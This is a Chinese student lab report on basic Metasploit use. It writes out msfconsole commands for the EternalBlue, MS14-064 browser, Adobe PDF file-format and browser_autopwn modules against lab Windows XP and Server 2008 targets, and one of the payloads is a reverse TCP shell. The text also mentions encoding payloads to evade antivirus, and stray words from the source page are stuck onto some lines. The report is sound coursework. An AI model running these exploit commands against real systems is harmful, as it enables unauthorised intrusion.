2018-2019-2 網絡對抗技術 20165227 Exp5 MSF基礎應用

2018-2019-2 網絡對抗技術 20165227 Exp5 MSF基礎應用

Exploit選取

  • 主動攻擊:ms17_010_eternalblue(成功)程序員

  • 瀏覽器攻擊:
  • ms10_042_helpctr_xss_cmd_exec (失敗)
  • ms4_064_ole_code_execution(成功)web

  • 客戶端攻擊:
  • adobe_toolbutton (成功且惟一)
  • adobe_pdf_embedded_exe(成功)shell

  • 成功應用任何一個輔助模塊:browser_autopwn(成功且惟一)windows

課上問題思考

  • Exploit:網上的解釋是Exploit 的英文意思爲利用,它在黑客眼裏就是漏洞利用。有漏洞不必定就有Exploit(利用),有Exploit就確定有漏洞。我本身的理解是一種攻擊模塊。
  • Payload:字面意思 「有效載荷,有效負荷,有效載重」。對於程序員來講就是在程序中起關鍵做用的代碼。
  • Encode:對payload進行必定程度的編碼,從而使之達到免殺的程度

實驗步驟

實驗一:使用ms17_010_eternalblue進行主動攻擊(靶機:Windows Server 2008 R2 (x64) )

  • 首先進入msf的模塊目錄下,查看可用的exploit
    瀏覽器

  • 進入msfconsole,查看適用的靶機系統版本以及須要設置的參數項等相關信息
  • 使用該模塊,進行設置(靶機IP:192.168.245.134; 攻擊機IP:192.168.245.132)
use exploit/windows/smb/ms17_010_eternalblue.rb  //使用該模塊
show payloads  //查看載荷
set payload generic/shell_reverse_tcp  //使用tcp反彈鏈接
set LHOST 192.168.245.132  //設置攻擊機的IP,即KALI的IP地址
set LPORT 5227  //設置攻擊端口
set RHOST 192.168.245.134  //設置靶機IP
set target 0  //選擇自動目標系統類型

  • 使用exploit 進行監聽攻擊
  • 攻擊成功

實驗二:使用ms14_064_ole_code_execution進行瀏覽器攻擊(靶機:winXP SP3 IE 8)

  • 使用search 命令查找有關瀏覽器攻擊的漏洞
  • 攻擊過程:
use exploit/windows/browser/ms14_064_ole_code_execution
info
  • 查看配置信息
    服務器

  • 容許的版本
    網絡

  • 描述
    xss

描述:此模塊利用Windows OLE自動化陣列漏洞,CVE-2014-6332。已知該漏洞會影響互聯網在Windows 95到Windows 10之間的版本11以前的資源管理器3.0,沒有Windows XP的補丁。然而,這種攻擊只針對因爲PowerShell限制,Windows XP和Windows 7框。默認狀況下,Windows XP支持vbs,所以它用做攻擊向量。在其餘較新的Windows系統上,該漏洞將嘗試改用PowerShell
  • 設置相關信息
    tcp

  • 攻擊成功
    學習

實驗三:客戶端攻擊(靶機:winXP+Adobe Reader 9.3)

使用adobe_toolbutton 進行客戶端攻擊(成功且惟一)
  • 經過search 命令查找到適合攻擊的漏洞
  • 過程
use windows/fileformat/adobe_toolbutton
info
  • 相關信息

  • 描述

描述:此模塊利用Adobe Reader上的「空閒後使用」條件11.0.二、10.1.6和9.5.4及更高版本。脆弱性在處理toolbutton對象時存在,其中回調可用於提早釋放對象內存。之後使用對象容許在空閒條件下觸發使用。這個模塊已在Adobe Reader 11.0.二、10.0.4上成功測試。
  • 進行相關設置,生成PDF文件

  • 將PDF文件傳入靶機中
  • kali攻擊機打開監聽模式

  • 靶機打開PDF文件,攻擊成功,得到權限

使用adobe_pdf_embedded_exe 進行客戶端攻擊
  • 經過search 命令查找到適合攻擊的漏洞
  • 攻擊過程
use windows/fileformat/adobe_pdf_embedded_exe
info
  • 相關信息
描述:此模塊利用智能獨立的在版本8.2.4和9.3.4中的glyplets(sing)表處理Adobe閱讀器之前的版本也被認爲是易受攻擊的
  • 生成文件

  • 切換成監聽模式

  • 在靶機中打開PDF文件,攻擊成功

實驗四:browser_autopwn 輔助模塊(成功且惟一)

  • 經過search auxiliary 查找輔助模塊,找到適合的進行運行
  • 過程
use auxiliary/server/browser_autopwn
info
set SRVHOST 172.30.0.189
set SRVPORT 5227
set LHOST 17.30.0.189
run
  • 相關信息

  • 描述

描述:這個模塊有三個動做。第一個(和默認值)是使用客戶端和服務器端組合的「webserver」對HTTP客戶端進行指紋識別,而後自動利用它們。接下來是「defangeddetection」,它只執行指紋部分。最後,「list」只打印全部利用Web服務器操做將使用的模塊當前匹配和排除選項。還添加了一個「list」命令,與運行action=list相同
  • 攻擊成功

實驗感想

  • 此次的實驗讓咱們充分體驗了一把,尋找漏洞,尋找靶機,而後進行攻擊。過程是十分不容易的,由於靶機類型、瀏覽器版本、客戶端版本,都對攻擊的結果有而很大的影響,是決定是否攻擊成功的關鍵部分,也是漏洞很差找,攻擊很差攻擊的一方面,不過在這個實驗過程當中也是讓本身對於網絡攻防這門課有了更加深入的認識,但願還能學習到不少有意思的知識。
相關文章
相關標籤/搜索